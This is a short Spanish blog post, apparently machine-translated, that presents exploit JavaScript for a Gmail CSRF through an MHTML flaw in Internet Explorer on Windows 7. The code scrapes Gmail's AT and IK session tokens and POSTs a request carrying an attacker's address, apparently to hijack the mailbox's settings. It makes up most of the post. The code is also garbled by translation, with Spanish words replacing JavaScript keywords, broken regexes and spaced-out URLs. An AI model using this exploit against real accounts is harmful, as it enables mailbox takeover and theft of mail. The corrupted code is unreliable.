El uso de una vulnerabilidad de GMAIL MHTML en un WIN7

  
        

Hace mucho tiempo que no se actualizaba el blog, se convirtió en un código de prueba de la vulnerabilidad de GMAIL MHtml en Win7, la última versión completa no sabía a dónde ir: -!

Vulnerabilidad de MHtml en Win7 < Br> para iniciar una solicitud AJax, a diferencia de XP solicita directamente el protocolo HTTP, la URL solicitada también debe estar en el protocolo MHtml, de lo contrario no hay permiso, la estrategia homóloga en Win7 parece ser más estricta que XP. No sé si alguien notó este detalle.

Para atacar GMAIL para el CSRF de la autoridad relacionada, debe tomar los parámetros AT e IK para tener éxito. Por supuesto, hay muchas formas de tomar estos dos parámetros, que pueden tomarse desde la COOKIE o directamente desde la página. El siguiente código se toma directamente de la página.

xmlHttp = new ActiveXObject ("Microsoft.XMLHttp");
XMLHttp.open ("GET", "mHtml: https: //mail.google.com/mail/h/0/", Verdad);
XMLHttp.send ();

XMLHttp.onreadystatechange = function () {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200 ) {
REX = /href=\\".*?at=({{ disco)) /"exg(XMLHttp.responseText);
AThash = RegExp. $ 1;
XMLHttp. Abrir ("GET", "mHtml: https: //mail.google.com/mail/", true);
XMLHttp.send ();
XMLHttp.onreadystatechange = function () {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200) {
REX = /GLOBALS=\\[.*?,"(.{10})",/.exec(XMLHttp .responseText);
IKhash = RegExp. $ 1;
XMLHttp.open ("POST", "mHtml: https: //mail.google.com/mail/? ui = 2" + "&ik = "+ IKhash +" &vIEw = mdlg &at = "+ AThash, true);
XMLHttp.setRequestHeader (" Content-Type "," application /x-www-form-urlencoded ");
XMLHttp. Enviar ("mdrp = 1 &mda =% 0D% 0A" + Tmail + "% 0D% 0A");
}
}
}
}
}
}
}

Copyright © Conocimiento de Windows All Rights Reserved